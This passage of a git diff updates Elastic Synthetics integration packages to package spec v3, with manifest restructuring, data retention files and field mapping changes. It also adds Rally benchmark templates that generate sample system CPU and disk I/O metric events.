type: boolean description: > True if no further checks will be performed in this retry group. + - name: retry_group type: keyword - description: > - A unique token used to group checks across attempts. \ No newline at end of file + description: >- + A unique token used to group checks across attempts. diff --git a/packages/synthetics/data_stream/browser_screenshot/fields/synthetics.yml b/packages/synthetics/data_stream/browser_screenshot/fields/synthetics.yml index 53baa9148d8..c349cf35969 100644 --- a/packages/synthetics/data_stream/browser_screenshot/fields/synthetics.yml +++ b/packages/synthetics/data_stream/browser_screenshot/fields/synthetics.yml @@ -15,6 +15,7 @@ - name: payload type: object + object_type: text enabled: false - name: blob type: binary diff --git a/packages/synthetics/data_stream/browser_screenshot/lifecycle.yml b/packages/synthetics/data_stream/browser_screenshot/lifecycle.yml new file mode 100644 index 00000000000..655b101047b --- /dev/null +++ b/packages/synthetics/data_stream/browser_screenshot/lifecycle.yml @@ -0,0 +1 @@ +data_retention: "14d" diff --git a/packages/synthetics/data_stream/browser_screenshot/manifest.yml b/packages/synthetics/data_stream/browser_screenshot/manifest.yml index b1d8329da74..ef2905baf52 100644 --- a/packages/synthetics/data_stream/browser_screenshot/manifest.yml +++ b/packages/synthetics/data_stream/browser_screenshot/manifest.yml @@ -9,9 +9,11 @@ elasticsearch: settings: index: codec: best_compression - sort.field: - - "monitor.id" - privileges.indices: [auto_configure, create_doc, read] + sort: + field: + - "monitor.id" + privileges: + indices: [auto_configure, create_doc, read] streams: - input: synthetics/browser title: Synthetics monitors screenshot information diff --git a/packages/synthetics/data_stream/http/fields/common.yml b/packages/synthetics/data_stream/http/fields/common.yml index feb2d2623d3..02b25d52a89 100644 --- a/packages/synthetics/data_stream/http/fields/common.yml +++ b/packages/synthetics/data_stream/http/fields/common.yml @@ -15,10 +15,11 @@ object_type: keyword description: > The meta fields allow you to add additional information to a monitor. + - name: monitor type: group description: > - Common monitor fields. + Common monitor fields. fields: - name: type @@ -58,7 +59,6 @@ IP of service being monitored. If service is monitored by hostname, the `ip` field contains the resolved ip address for the current host. - name: status - required: true type: keyword description: > Indicator if monitor could validate the service to be available. diff --git a/packages/synthetics/data_stream/http/fields/ecs.yml b/packages/synthetics/data_stream/http/fields/ecs.yml index c2d2b7940fb..55779a51123 100644 --- a/packages/synthetics/data_stream/http/fields/ecs.yml +++ b/packages/synthetics/data_stream/http/fields/ecs.yml @@ -168,6 +168,7 @@ - name: answers level: extended type: object + object_type: keyword description: "An array containing an object for each answer section returned by the server.\nThe main keys that should be present in these objects are defined by ECS. Records that have more information may contain more keys than what ECS defines.\nNot all DNS data sources give all details about DNS answers. At minimum, answer objects must contain the `data` key. If more information is available, map as much of it to ECS as possible, and add any additional fields to the answer objects as custom fields." - name: answers.class level: extended @@ -285,7 +286,6 @@ fields: - name: version level: core - required: true type: keyword ignore_above: 1024 description: "ECS version this event conforms to. `ecs.version` is a required field and must exist in all events.\nWhen querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events." diff --git a/packages/synthetics/data_stream/http/fields/http.yml b/packages/synthetics/data_stream/http/fields/http.yml index 40dd8b42ee9..b113de142eb 100644 --- a/packages/synthetics/data_stream/http/fields/http.yml +++ b/packages/synthetics/data_stream/http/fields/http.yml @@ -22,6 +22,7 @@ - name: headers.* type: object + object_type: keyword enabled: false description: > The canonical headers of the monitored HTTP response. diff --git a/packages/synthetics/data_stream/http/fields/summary.yml b/packages/synthetics/data_stream/http/fields/summary.yml index 34bb24ac038..a35396da23c 100644 --- a/packages/synthetics/data_stream/http/fields/summary.yml +++ b/packages/synthetics/data_stream/http/fields/summary.yml @@ -16,19 +16,23 @@ type: keyword description: > The status of this check as a whole. Either up or down. + - name: attempt type: short description: > When performing a check this number is 1 for the first check, and increments in the event of a retry. + - name: max_attempts type: short description: > The maximum number of checks that may be performed. Note, the actual number may be smaller. + - name: final_attempt type: boolean description: > True if no further checks will be performed in this retry group. + - name: retry_group type: keyword - description: > - A unique token used to group checks across attempts. \ No newline at end of file + description: >- + A unique token used to group checks across attempts. diff --git a/packages/synthetics/data_stream/http/fields/tls.yml b/packages/synthetics/data_stream/http/fields/tls.yml index 4174905380c..4caa93a4cda 100644 --- a/packages/synthetics/data_stream/http/fields/tls.yml +++ b/packages/synthetics/data_stream/http/fields/tls.yml @@ -6,10 +6,8 @@ fields: - name: certificate_not_valid_before type: date - deprecated: 7.8.0 description: Deprecated in favor of `tls.server.x509.not_before`. Earliest time at which the connection's certificates are valid. - name: certificate_not_valid_after - deprecated: 7.8.0 type: date description: Deprecated in favor of `tls.server.x509.not_after`. Latest time at which the connection's certificates are valid. - name: rtt diff --git a/packages/synthetics/data_stream/http/lifecycle.yml b/packages/synthetics/data_stream/http/lifecycle.yml new file mode 100644 index 00000000000..d00bd25910f --- /dev/null +++ b/packages/synthetics/data_stream/http/lifecycle.yml @@ -0,0 +1 @@ +data_retention: "365d" diff --git a/packages/synthetics/data_stream/http/manifest.yml b/packages/synthetics/data_stream/http/manifest.yml index a2d119d900a..f3fc8b50e9a 100644 --- a/packages/synthetics/data_stream/http/manifest.yml +++ b/packages/synthetics/data_stream/http/manifest.yml @@ -9,10 +9,12 @@ elasticsearch: settings: index: codec: best_compression - sort.field: - - "monitor.id" - - "url.full.keyword" - privileges.indices: [auto_configure, create_doc, read] + sort: + field: + - "monitor.id" + - "url.full.keyword" + privileges: + indices: [auto_configure, create_doc, read] streams: - input: synthetics/http title: Synthetic monitor check @@ -52,7 +54,7 @@ streams: multi: false required: true show_user: true - default: "\"@every 3m\"" + default: '"@every 3m"' - name: urls type: text title: URL @@ -241,7 +243,7 @@ streams: title: Heartbeat mode multi: false required: false - show_user: true + show_user: true - name: ipv4 type: bool title: Use the ipv4 protocol @@ -270,4 +272,4 @@ streams: multi: false required: false show_user: true - default: 2 \ No newline at end of file + default: 2 diff --git a/packages/synthetics/data_stream/icmp/fields/common.yml b/packages/synthetics/data_stream/icmp/fields/common.yml index f8b7a9c61df..7b0cae0b4bb 100644 --- a/packages/synthetics/data_stream/icmp/fields/common.yml +++ b/packages/synthetics/data_stream/icmp/fields/common.yml @@ -15,6 +15,7 @@ object_type: keyword description: > The meta fields allow you to add additional information to a monitor. + - name: monitor type: group description: > @@ -58,7 +59,6 @@ IP of service being monitored. If service is monitored by hostname, the `ip` field contains the resolved ip address for the current host. - name: status - required: true type: keyword description: > Indicator if monitor could validate the service to be available. diff --git a/packages/synthetics/data_stream/icmp/fields/ecs.yml b/packages/synthetics/data_stream/icmp/fields/ecs.yml index c2d2b7940fb..5d1d45001bd 100644 --- a/packages/synthetics/data_stream/icmp/fields/ecs.yml +++ b/packages/synthetics/data_stream/icmp/fields/ecs.yml @@ -169,6 +169,7 @@ level: extended type: object description: "An array containing an object for each answer section returned by the server.\nThe main keys that should be present in these objects are defined by ECS. Records that have more information may contain more keys than what ECS defines.\nNot all DNS data sources give all details about DNS answers. At minimum, answer objects must contain the `data` key. If more information is available, map as much of it to ECS as possible, and add any additional fields to the answer objects as custom fields." + object_type: keyword - name: answers.class level: extended type: keyword @@ -285,7 +286,6 @@ fields: - name: version level: core - required: true type: keyword ignore_above: 1024 description: "ECS version this event conforms to. `ecs.version` is a required field and must exist in all events.\nWhen querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events." diff --git a/packages/synthetics/data_stream/icmp/fields/summary.yml b/packages/synthetics/data_stream/icmp/fields/summary.yml index 34bb24ac038..a35396da23c 100644 --- a/packages/synthetics/data_stream/icmp/fields/summary.yml +++ b/packages/synthetics/data_stream/icmp/fields/summary.yml @@ -16,19 +16,23 @@ type: keyword description: > The status of this check as a whole. Either up or down. + - name: attempt type: short description: > When performing a check this number is 1 for the first check, and increments in the event of a retry. + - name: max_attempts type: short description: > The maximum number of checks that may be performed. Note, the actual number may be smaller. + - name: final_attempt type: boolean description: > True if no further checks will be performed in this retry group. + - name: retry_group type: keyword - description: > - A unique token used to group checks across attempts. \ No newline at end of file + description: >- + A unique token used to group checks across attempts. diff --git a/packages/synthetics/data_stream/icmp/fields/tls.yml b/packages/synthetics/data_stream/icmp/fields/tls.yml index 4174905380c..4caa93a4cda 100644 --- a/packages/synthetics/data_stream/icmp/fields/tls.yml +++ b/packages/synthetics/data_stream/icmp/fields/tls.yml @@ -6,10 +6,8 @@ fields: - name: certificate_not_valid_before type: date - deprecated: 7.8.0 description: Deprecated in favor of `tls.server.x509.not_before`. Earliest time at which the connection's certificates are valid. - name: certificate_not_valid_after - deprecated: 7.8.0 type: date description: Deprecated in favor of `tls.server.x509.not_after`. Latest time at which the connection's certificates are valid. - name: rtt diff --git a/packages/synthetics/data_stream/icmp/lifecycle.yml b/packages/synthetics/data_stream/icmp/lifecycle.yml new file mode 100644 index 00000000000..d00bd25910f --- /dev/null +++ b/packages/synthetics/data_stream/icmp/lifecycle.yml @@ -0,0 +1 @@ +data_retention: "365d" diff --git a/packages/synthetics/data_stream/icmp/manifest.yml b/packages/synthetics/data_stream/icmp/manifest.yml index 151aa0e4fee..c6840cecb71 100644 --- a/packages/synthetics/data_stream/icmp/manifest.yml +++ b/packages/synthetics/data_stream/icmp/manifest.yml @@ -9,10 +9,12 @@ elasticsearch: settings: index: codec: best_compression - sort.field: - - "monitor.id" - - "url.full.keyword" - privileges.indices: [auto_configure, create_doc, read] + sort: + field: + - "monitor.id" + - "url.full.keyword" + privileges: + indices: [auto_configure, create_doc, read] streams: - input: synthetics/icmp title: Synthetic monitor check @@ -52,7 +54,7 @@ streams: multi: false required: true show_user: true - default: "\"@every 3m\"" + default: '"@every 3m"' - name: wait type: text title: Wait @@ -116,7 +118,7 @@ streams: title: Heartbeat mode multi: false required: false - show_user: true + show_user: true - name: ipv4 type: bool title: Use the ipv4 protocol @@ -145,4 +147,4 @@ streams: multi: false required: false show_user: true - default: 2 \ No newline at end of file + default: 2 diff --git a/packages/synthetics/data_stream/tcp/fields/common.yml b/packages/synthetics/data_stream/tcp/fields/common.yml index f23c23af249..1d9a3208a97 100644 --- a/packages/synthetics/data_stream/tcp/fields/common.yml +++ b/packages/synthetics/data_stream/tcp/fields/common.yml @@ -15,6 +15,7 @@ object_type: keyword description: > The meta fields allow you to add additional information to a monitor. + - name: monitor type: group description: > @@ -58,7 +59,6 @@ IP of service being monitored. If service is monitored by hostname, the `ip` field contains the resolved ip address for the current host. - name: status - required: true type: keyword description: > Indicator if monitor could validate the service to be available. diff --git a/packages/synthetics/data_stream/tcp/fields/ecs.yml b/packages/synthetics/data_stream/tcp/fields/ecs.yml index c2d2b7940fb..5d1d45001bd 100644 --- a/packages/synthetics/data_stream/tcp/fields/ecs.yml +++ b/packages/synthetics/data_stream/tcp/fields/ecs.yml @@ -169,6 +169,7 @@ level: extended type: object description: "An array containing an object for each answer section returned by the server.\nThe main keys that should be present in these objects are defined by ECS. Records that have more information may contain more keys than what ECS defines.\nNot all DNS data sources give all details about DNS answers. At minimum, answer objects must contain the `data` key. If more information is available, map as much of it to ECS as possible, and add any additional fields to the answer objects as custom fields." + object_type: keyword - name: answers.class level: extended type: keyword @@ -285,7 +286,6 @@ fields: - name: version level: core - required: true type: keyword ignore_above: 1024 description: "ECS version this event conforms to. `ecs.version` is a required field and must exist in all events.\nWhen querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events." diff --git a/packages/synthetics/data_stream/tcp/fields/summary.yml b/packages/synthetics/data_stream/tcp/fields/summary.yml index 34bb24ac038..a35396da23c 100644 --- a/packages/synthetics/data_stream/tcp/fields/summary.yml +++ b/packages/synthetics/data_stream/tcp/fields/summary.yml @@ -16,19 +16,23 @@ type: keyword description: > The status of this check as a whole. Either up or down. + - name: attempt type: short description: > When performing a check this number is 1 for the first check, and increments in the event of a retry. + - name: max_attempts type: short description: > The maximum number of checks that may be performed. Note, the actual number may be smaller. + - name: final_attempt type: boolean description: > True if no further checks will be performed in this retry group. + - name: retry_group type: keyword - description: > - A unique token used to group checks across attempts. \ No newline at end of file + description: >- + A unique token used to group checks across attempts. diff --git a/packages/synthetics/data_stream/tcp/fields/tls.yml b/packages/synthetics/data_stream/tcp/fields/tls.yml index 4174905380c..4caa93a4cda 100644 --- a/packages/synthetics/data_stream/tcp/fields/tls.yml +++ b/packages/synthetics/data_stream/tcp/fields/tls.yml @@ -6,10 +6,8 @@ fields: - name: certificate_not_valid_before type: date - deprecated: 7.8.0 description: Deprecated in favor of `tls.server.x509.not_before`. Earliest time at which the connection's certificates are valid. - name: certificate_not_valid_after - deprecated: 7.8.0 type: date description: Deprecated in favor of `tls.server.x509.not_after`. Latest time at which the connection's certificates are valid. - name: rtt diff --git a/packages/synthetics/data_stream/tcp/lifecycle.yml b/packages/synthetics/data_stream/tcp/lifecycle.yml new file mode 100644 index 00000000000..d00bd25910f --- /dev/null +++ b/packages/synthetics/data_stream/tcp/lifecycle.yml @@ -0,0 +1 @@ +data_retention: "365d" diff --git a/packages/synthetics/data_stream/tcp/manifest.yml b/packages/synthetics/data_stream/tcp/manifest.yml index c162c9e8775..e97aff2cb3f 100644 --- a/packages/synthetics/data_stream/tcp/manifest.yml +++ b/packages/synthetics/data_stream/tcp/manifest.yml @@ -9,10 +9,12 @@ elasticsearch: settings: index: codec: best_compression - sort.field: - - "monitor.id" - - "url.full.keyword" - privileges.indices: [auto_configure, create_doc, read] + sort: + field: + - "monitor.id" + - "url.full.keyword" + privileges: + indices: [auto_configure, create_doc, read] streams: - input: synthetics/tcp title: Synthetic monitor check @@ -52,7 +54,7 @@ streams: multi: false required: true show_user: true - default: "\"@every 3m\"" + default: '"@every 3m"' - name: hosts type: text title: Host @@ -170,7 +172,7 @@ streams: title: Heartbeat mode multi: false required: false - show_user: true + show_user: true - name: ipv4 type: bool title: Use the ipv4 protocol @@ -199,4 +201,4 @@ streams: multi: false required: false show_user: true - default: 2 \ No newline at end of file + default: 2 diff --git a/packages/synthetics/manifest.yml b/packages/synthetics/manifest.yml index f65158b904d..75a3519231b 100644 --- a/packages/synthetics/manifest.yml +++ b/packages/synthetics/manifest.yml @@ -1,12 +1,12 @@ -format_version: 1.0.0 +format_version: 3.0.0 name: synthetics title: Elastic Synthetics description: Internal Elastic integration for providing access to private locations. -version: 1.1.1 +version: 1.2.1 categories: ["observability"] -release: ga type: integration -license: basic +source: + license: Elastic-2.0 policy_templates: - name: synthetics title: Elastic Synthetics @@ -25,10 +25,16 @@ policy_templates: title: Browser description: Perform an Browser check conditions: - kibana.version: "^8.11.0" + elastic: + capabilities: + - "uptime" + subscription: "basic" + kibana: + version: "^8.11.0" icons: - src: /img/uptime-logo-color-64px.svg size: 16x16 type: image/svg+xml owner: github: elastic/obs-ux-infra_services-team + type: elastic diff --git a/packages/synthetics_dashboards/changelog.yml b/packages/synthetics_dashboards/changelog.yml index 7cbd1126192..ceb6e636f03 100644 --- a/packages/synthetics_dashboards/changelog.yml +++ b/packages/synthetics_dashboards/changelog.yml @@ -1,6 +1,11 @@ # newer versions go on top +- version: "1.0.1" + changes: + - description: Update to Package Spec v3 + type: enhancement + link: https://github.com/elastic/integrations/pull/9066 - version: "1.0.0" changes: - description: initial release type: enhancement # can be one of: enhancement, bugfix, breaking-change - link: https://github.com/elastic/integrations/pull/8032 \ No newline at end of file + link: https://github.com/elastic/integrations/pull/8032 diff --git a/packages/synthetics_dashboards/kibana/dashboard/synthetics_dashboards-e465c570-1561-11ee-9d3b-15ab835418fd.json b/packages/synthetics_dashboards/kibana/dashboard/synthetics_dashboards-e465c570-1561-11ee-9d3b-15ab835418fd.json index d81399cbb6d..a592cebd6f8 100644 --- a/packages/synthetics_dashboards/kibana/dashboard/synthetics_dashboards-e465c570-1561-11ee-9d3b-15ab835418fd.json +++ b/packages/synthetics_dashboards/kibana/dashboard/synthetics_dashboards-e465c570-1561-11ee-9d3b-15ab835418fd.json @@ -242,11 +242,13 @@ } } ], - "internalReferences": [{ - "id": "synthetics-dashboards-integration-adhoc", - "name": "indexpattern-datasource-layer-65aa1d2b-0064-4055-a37f-6144a7d1f3c7", - "type": "index-pattern" - }], + "internalReferences": [ + { + "id": "synthetics-dashboards-integration-adhoc", + "name": "indexpattern-datasource-layer-65aa1d2b-0064-4055-a37f-6144a7d1f3c7", + "type": "index-pattern" + } + ], "query": { "language": "kuery", "query": "" @@ -643,11 +645,13 @@ } } ], - "internalReferences": [{ - "id": "synthetics-dashboards-integration-adhoc", - "name": "indexpattern-datasource-layer-65aa1d2b-0064-4055-a37f-6144a7d1f3c7", - "type": "index-pattern" - }], + "internalReferences": [ + { + "id": "synthetics-dashboards-integration-adhoc", + "name": "indexpattern-datasource-layer-65aa1d2b-0064-4055-a37f-6144a7d1f3c7", + "type": "index-pattern" + } + ], "query": { "language": "kuery", "query": "" @@ -833,11 +837,13 @@ } } ], - "internalReferences": [{ - "id": "synthetics-dashboards-integration-adhoc", - "name": "indexpattern-datasource-layer-42ee11c3-ab9a-4b73-a2ba-65c4ad273b2d", - "type": "index-pattern" - }], + "internalReferences": [ + { + "id": "synthetics-dashboards-integration-adhoc", + "name": "indexpattern-datasource-layer-42ee11c3-ab9a-4b73-a2ba-65c4ad273b2d", + "type": "index-pattern" + } + ], "query": { "language": "kuery", "query": "" @@ -1062,11 +1068,13 @@ } } ], - "internalReferences": [{ - "id": "synthetics-dashboards-integration-adhoc", - "name": "indexpattern-datasource-layer-unifiedHistogram", - "type": "index-pattern" - }], + "internalReferences": [ + { + "id": "synthetics-dashboards-integration-adhoc", + "name": "indexpattern-datasource-layer-unifiedHistogram", + "type": "index-pattern" + } + ], "query": { "language": "kuery", "query": "" @@ -1386,11 +1394,13 @@ } } ], - "internalReferences": [{ - "id": "synthetics-dashboards-integration-adhoc", - "name": "indexpattern-datasource-layer-e1869c68-3f80-4b33-b75f-f9668b5bcd94", - "type": "index-pattern" - }], + "internalReferences": [ + { + "id": "synthetics-dashboards-integration-adhoc", + "name": "indexpattern-datasource-layer-e1869c68-3f80-4b33-b75f-f9668b5bcd94", + "type": "index-pattern" + } + ], "query": { "language": "kuery", "query": "" diff --git a/packages/synthetics_dashboards/manifest.yml b/packages/synthetics_dashboards/manifest.yml index a36d2c3bdfd..3087f1bed3f 100644 --- a/packages/synthetics_dashboards/manifest.yml +++ b/packages/synthetics_dashboards/manifest.yml @@ -1,17 +1,23 @@ -format_version: 1.0.0 +format_version: 3.0.4 name: synthetics_dashboards title: Elastic Synthetics Dashboards description: Explore Elastic Synthetics metrics with these dashboards. -version: 1.0.0 +version: 1.0.1 categories: ["observability"] -release: ga type: integration -license: basic +source: + license: Elastic-2.0 conditions: - kibana.version: "^8.10.1" + elastic: + capabilities: + - "uptime" + subscription: basic + kibana: + version: "^8.10.1" icons: - src: /img/uptime-logo-color-64px.svg size: 16x16 type: image/svg+xml owner: - github: elastic/obs-ux-infra_services-team \ No newline at end of file + type: elastic + github: elastic/obs-ux-infra_services-team diff --git a/packages/system/_dev/benchmark/rally/cpu-benchmark.yml b/packages/system/_dev/benchmark/rally/cpu-benchmark.yml new file mode 100644 index 00000000000..12b70350901 --- /dev/null +++ b/packages/system/_dev/benchmark/rally/cpu-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark 20000 system.cpu events ingested +data_stream: + name: cpu +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./cpu-benchmark/template.ndjson + config: + path: ./cpu-benchmark/config.yml + fields: + path: ./cpu-benchmark/fields.yml diff --git a/packages/system/_dev/benchmark/rally/cpu-benchmark/config.yml b/packages/system/_dev/benchmark/rally/cpu-benchmark/config.yml new file mode 100644 index 00000000000..2e353a48fd3 --- /dev/null +++ b/packages/system/_dev/benchmark/rally/cpu-benchmark/config.yml @@ -0,0 +1,99 @@ +fields: + - name: timestamp + period: 60m + - name: event_duration + range: + min: 0 + max: 100000 + - name: user_pct + range: + min: 0 + max: 100 + - name: nice_pct + range: + min: 0 + max: 100 + - name: idle_pct + range: + min: 0 + max: 100 + - name: iowait_pct + range: + min: 0 + max: 100 + - name: irq_pct + range: + min: 0 + max: 100 + - name: softirq_pct + range: + min: 0 + max: 100 + - name: steal_pct + range: + min: 0 + max: 100 + - name: total_pct + range: + min: 0 + max: 100 + - name: user_norm_pct + range: + min: 0 + max: 100 + - name: norm_pct + range: + min: 0 + max: 100 + - name: nice_norm_pct + range: + min: 0 + max: 100 + - name: idle_norm_pct + range: + min: 0 + max: 100 + - name: iowait_norm_pct + range: + min: 0 + max: 100 + - name: irq_norm_pct + range: + min: 0 + max: 100 + - name: softirq_norm_pct + range: + min: 0 + max: 100 + - name: system_pct + range: + min: 0 + max: 100 + - name: steal_norm_pct + range: + min: 0 + max: 100 + - name: total_norm_pct + range: + min: 0 + max: 100 + - name: user_ticks + counter: true + - name: system_ticks + counter: true + - name: nice_ticks + counter: true + - name: idle_ticks + counter: true + - name: iowait_ticks + counter: true + - name: irq_ticks + counter: true + - name: softirq_ticks + counter: true + - name: steal_ticks + counter: true + - name: cpu_pct + range: + min: 0 + max: 1 diff --git a/packages/system/_dev/benchmark/rally/cpu-benchmark/fields.yml b/packages/system/_dev/benchmark/rally/cpu-benchmark/fields.yml new file mode 100644 index 00000000000..cea2cbcbe34 --- /dev/null +++ b/packages/system/_dev/benchmark/rally/cpu-benchmark/fields.yml @@ -0,0 +1,60 @@ +- name: timestamp + type: date +- name: event_duration + type: long +- name: user_pct + type: float +- name: nice_pct + type: float +- name: idle_pct + type: float +- name: iowait_pct + type: float +- name: irq_pct + type: float +- name: softirq_pct + type: float +- name: steal_pct + type: float +- name: total_pct + type: float +- name: user_norm_pct + type: float +- name: norm_pct + type: float +- name: nice_norm_pct + type: float +- name: idle_norm_pct + type: float +- name: iowait_norm_pct + type: float +- name: irq_norm_pct + type: float +- name: system_pct + type: float +- name: softirq_norm_pct + type: float +- name: steal_norm_pct + type: float +- name: total_norm_pct + type: float +- name: user_ticks + type: long +- name: system_ticks + type: long +- name: nice_ticks + type: long +- name: idle_ticks + type: long +- name: iowait_ticks + type: long +- name: irq_ticks + type: long +- name: softirq_ticks + type: long +- name: steal_ticks + type: long +- name: total_ticks + type: long +- name: cpu_pct + type: float diff --git a/packages/system/_dev/benchmark/rally/cpu-benchmark/template.ndjson b/packages/system/_dev/benchmark/rally/cpu-benchmark/template.ndjson new file mode 100644 index 00000000000..7b0c7d280c0 --- /dev/null +++ b/packages/system/_dev/benchmark/rally/cpu-benchmark/template.ndjson @@ -0,0 +1,154 @@ +{{- $event_duration := generate "event_duration" }} +{{- $timestamp := generate "timestamp" }} +{{- $user_pct := generate "user_pct" }} +{{- $nice_pct := generate "nice_pct" }} +{{- $idle_pct := generate "idle_pct" }} +{{- $iowait_pct := generate "iowait_pct" }} +{{- $irq_pct := generate "irq_pct" }} +{{- $softirq_pct := generate "softirq_pct" }} +{{- $steal_pct := generate "steal_pct" }} +{{- $total_pct := generate "total_pct" }} +{{- $user_norm_pct := generate "user_norm_pct" }} +{{- $norm_pct := generate "norm_pct" }} +{{- $nice_norm_pct := generate "nice_norm_pct" }} +{{- $idle_norm_pct := generate "idle_norm_pct" }} +{{- $iowait_norm_pct := generate "iowait_norm_pct" }} +{{- $irq_norm_pct := generate "irq_norm_pct" }} +{{- $system_pct := generate "system_pct" }} +{{- $softirq_norm_pct := generate "softirq_norm_pct" }} +{{- $steal_norm_pct := generate "steal_norm_pct" }} +{{- $total_norm_pct := generate "total_norm_pct" }} +{{- $user_ticks := generate "user_ticks" }} +{{- $nice_ticks := generate "nice_ticks" }} +{{- $idle_ticks := generate "idle_ticks" }} +{{- $iowait_ticks := generate "iowait_ticks" }} +{{- $irq_ticks := generate "irq_ticks" }} +{{- $softirq_ticks := generate "softirq_ticks" }} +{{- $steal_ticks := generate "steal_ticks" }} +{{- $system_ticks := generate "system_ticks" }} +{{- $total_ticks := generate "total_ticks" }} +{{- $cpu_pct := generate "cpu_pct" }} +{ + "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z07:00" }}", + "agent": { + "ephemeral_id": "22ed892c-43bd-408a-9121-65e2f5b6a56e", + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "name": "system-scale-123456", + "type": "metricbeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "system.cpu", + "namespace": "ep", + "type": "metrics" + }, + "ecs": { + "version": "8.0.0" + }, + "elastic_agent": { + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "snapshot": false, + "version": "8.12.0" + }, + "event": { + "agent_id_status": "verified", + "duration": {{ $event_duration }}, + "module": "system" + }, + "host": { + "architecture": "x86_64", + "containerized": true, + "cpu": { + "pct": {{ $cpu_pct }} + }, + "hostname": "docker-fleet-agent", + "id": "829324aac17946dcace17006fa82a2d2", + "ip": "192.168.254.7", + "mac": "02-42-C0-A8-FE-07", + "name": "docker-fleet-agent", + "os": { + "codename": "focal", + "family": "debian", + "kernel": "3.10.0-1160.105.1.el7.x86_64", + "name": "Ubuntu", + "platform": "ubuntu", + "type": "linux", + "version": "20.04.6 LTS (Focal Fossa)" + } + }, + "metricset": { + "name": "cpu", + "period": 10000 + }, + "service": { + "type": "system" + }, + "system": { + "cpu": { + "cores": 12, + "idle": { + "norm": { + "pct": {{ divf $idle_norm_pct 100 }} + }, + "pct": {{ $idle_pct }}, + "ticks": {{ $idle_ticks }} + }, + "iowait": { + "norm": { + "pct": {{ divf $iowait_norm_pct 100 }} + }, + "pct": {{ $iowait_pct }}, + "ticks": {{ $iowait_ticks }} + }, + "irq": { + "norm": { + "pct": {{ divf $irq_norm_pct 100 }} + }, + "pct": {{ $irq_pct }}, + "ticks": {{ $irq_ticks }} + }, + "nice": { + "norm": { + "pct": {{ divf $nice_norm_pct 100 }} + }, + "pct": {{ $nice_pct }}, + "ticks": {{ $nice_ticks }} + }, + "softirq": { + "norm": { + "pct": {{ divf $softirq_norm_pct 100 }} + }, + "pct": {{ $softirq_pct }}, + "ticks": {{ $softirq_ticks }} + }, + "steal": { + "norm": { + "pct": {{ divf $steal_norm_pct 100 }} + }, + "pct": {{ $steal_pct }}, + "ticks": {{ $steal_ticks }} + }, + "system": { + "norm": { + "pct": {{ divf $norm_pct 100 }} + }, + "pct": {{ $system_pct }}, + "ticks": {{ $system_ticks }} + }, + "total": { + "norm": { + "pct": {{ divf $total_norm_pct 100 }} + }, + "pct": {{ $total_pct }}, + "ticks": {{ $total_ticks }} + }, + "user": { + "norm": { + "pct": {{ divf $user_norm_pct 100 }} + }, + "pct": {{ $user_pct }}, + "ticks": {{ $user_ticks }} + } + } + } +} \ No newline at end of file diff --git a/packages/system/_dev/benchmark/rally/diskio-benchmark.yml b/packages/system/_dev/benchmark/rally/diskio-benchmark.yml new file mode 100644 index 00000000000..1c6535e11e1 --- /dev/null +++ b/packages/system/_dev/benchmark/rally/diskio-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark 20000 system.diskio events ingested +data_stream: + name: diskio +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./diskio-benchmark/template.ndjson + config: + path: ./diskio-benchmark/config.yml + fields: + path: ./diskio-benchmark/fields.yml diff --git a/packages/system/_dev/benchmark/rally/diskio-benchmark/config.yml b/packages/system/_dev/benchmark/rally/diskio-benchmark/config.yml new file mode 100644 index 00000000000..9e00a864bb5 --- /dev/null +++ b/packages/system/_dev/benchmark/rally/diskio-benchmark/config.yml @@ -0,0 +1,27 @@ +fields: + - name: timestamp + period: -60m + - name: event_duration + range: + min: 0 + max: 100000 + - name: system_diskio_name + enum: ["sda", "sda1", "sda2", "dm-0", "dm-1"] + - name: system_diskio_read_count + counter: true + - name: system_diskio_write_count + counter: true + - name: system_diskio_read_bytes + counter: true + - name: system_diskio_write_bytes + counter: true + - name: system_diskio_read_time + counter: true + - name: system_diskio_write_time + counter: true + - name: system_diskio_io_time + counter: true + - name: system_diskio_io_ops + range: + min: 0 + max: 10 diff --git a/packages/system/_dev/benchmark/rally/diskio-benchmark/fields.yml b/packages/system/_dev/benchmark/rally/diskio-benchmark/fields.yml new file mode 100644 index 00000000000..73a5694b12a --- /dev/null +++ b/packages/system/_dev/benchmark/rally/diskio-benchmark/fields.yml @@ -0,0 +1,22 @@ +- name: timestamp + type: date +- name: event_duration + type: long +- name: system_diskio_name + type: keyword +- name: system_diskio_read_count + type: long +- name: system_diskio_write_count + type: long +- name: system_diskio_read_bytes + type: long +- name: system_diskio_write_bytes + type: long +- name: system_diskio_read_time + type: long +- name: system_diskio_write_time + type: long +- name: system_diskio_io_time + type: long +- name: system_diskio_io_ops + type: long diff --git a/packages/system/_dev/benchmark/rally/diskio-benchmark/template.ndjson b/packages/system/_dev/benchmark/rally/diskio-benchmark/template.ndjson new file mode 100644 index 00000000000..7a212e30810 --- /dev/null +++ b/packages/system/_dev/benchmark/rally/diskio-benchmark/template.ndjson @@ -0,0 +1,95 @@ +{{- $event_duration := generate "event_duration" }} +{{- $timestamp := generate "timestamp" }} +{{- $system_diskio_io_time := generate "system_diskio_io_time" }} +{{- $system_diskio_io_ops := generate "system_diskio_io_ops" }} +{{- $system_diskio_name := generate "system_diskio_name" }} +{{- $system_diskio_read_count := generate "system_diskio_read_count" }} +{{- $system_diskio_write_count := generate "system_diskio_write_count" }} +{{- $system_diskio_read_bytes := generate "system_diskio_read_bytes" }} +{{- $system_diskio_write_bytes := generate "system_diskio_write_bytes" }} +{{- $system_diskio_read_time := generate "system_diskio_read_time" }} +{{- $system_diskio_write_time := generate "system_diskio_write_time" }} +{ + "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z07:00" }}", + "agent": { + "ephemeral_id": "22ed892c-43bd-408a-9121-65e2f5b6a56e", + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "name": "system-scale-123456", + "type": "metricbeat", + "version": "8.8.0" + }, + "data_stream": { + "dataset": 